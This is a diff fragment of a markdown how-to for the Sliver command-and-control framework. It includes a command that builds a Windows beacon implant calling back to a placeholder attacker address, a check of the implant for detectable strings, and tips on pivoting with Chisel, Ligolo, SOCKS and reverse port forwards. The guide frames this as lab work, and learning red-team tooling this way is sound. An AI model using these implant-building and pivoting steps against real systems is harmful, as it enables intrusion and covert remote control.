hanzotrip7/hanzotrip7.github.io/c2_how-to.md

 generate beacon --mtls ATTACKER_REACHABLE_IP:8888 --os windows --arch amd64 --seconds 60 --jitter 30 --save /tmp/beacon.exe --skip-symbols
 ```

 > **Build-comparison note:** `--skip-symbols` creates a smaller implant but leaves more recognizable Go and Sliver-related strings for static analysis.
-In a controlled lab, compare builds with and without the option to understand the size and detection trade-offs.
+In a controlled lab, compare builds with and without the option:

-**Pivoting tip:** Use sessions for workflows that require immediate command execution, such as running interactive tools or managing tunnels.
-Beacons execute work asynchronously and may not be suitable for long-running interactive tasks.
-Check the help output for your installed Sliver release before relying on a command in beacon mode.
+>
+> ```bash
+> strings implant.exe | grep -i sliver | tail -10
+> ```

+**Pivoting tip:** Prefer **sessions** over beacons when deploying Chisel or Ligolo agents and when using interactive Sliver functionality, including `shell`, `socks5`, and `rportfwd`.
+Beacons execute work asynchronously and can be unsuitable for long-running interactive tasks.
+If you only have a beacon, run `interactive` first to upgrade it to a session.

 ### Interact with a session